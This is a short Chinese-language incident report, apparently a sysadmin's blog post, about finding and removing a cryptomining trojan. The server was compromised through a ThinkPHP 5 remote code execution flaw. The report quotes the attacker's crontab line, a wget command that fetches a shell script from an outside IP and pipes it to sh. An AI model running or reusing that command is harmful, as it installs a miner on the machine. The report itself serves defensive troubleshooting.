昨天發現 一臺伺服器突然慢了 top 顯示 幾個程式100%以上的cpu使用
執行命令為 :
/tmp/php -s /tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來源
last 沒有登陸記錄
先幹掉這幾個程式,但是幾分鐘之後又出現了
先看看這個木馬想幹什麼吧
netstat 看到 這個木馬開啟了一個埠和國外的某個ip建立了連線
但是tcpdump了一小會兒 沒有發現任何資料傳遞
這他是想幹啥?
繼續檢視日誌吧
在cron日誌中發現了www使用者 有一個crontab定時操作 基本就是這個問題了
wget -q -O – http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
順著下載了幾個問題,看了看 應該是個挖礦的木馬程式
伺服器上的www使用者 是安裝 lnmp 建立的,看了來源很可能就是web漏洞了。
再看/tmp下的php的許可權 就是www的
檢視 lnmp下幾個站的日誌 發現是利用 thinkphp 5最近爆出的遠端程式碼執行漏洞
漏洞細節:https://nosec.org/home/detail…
修復一下問題解決
但是 這個站點是測試站點 埠監聽的是 8083 ,難道現在黑客能開始嗅探非常規埠了?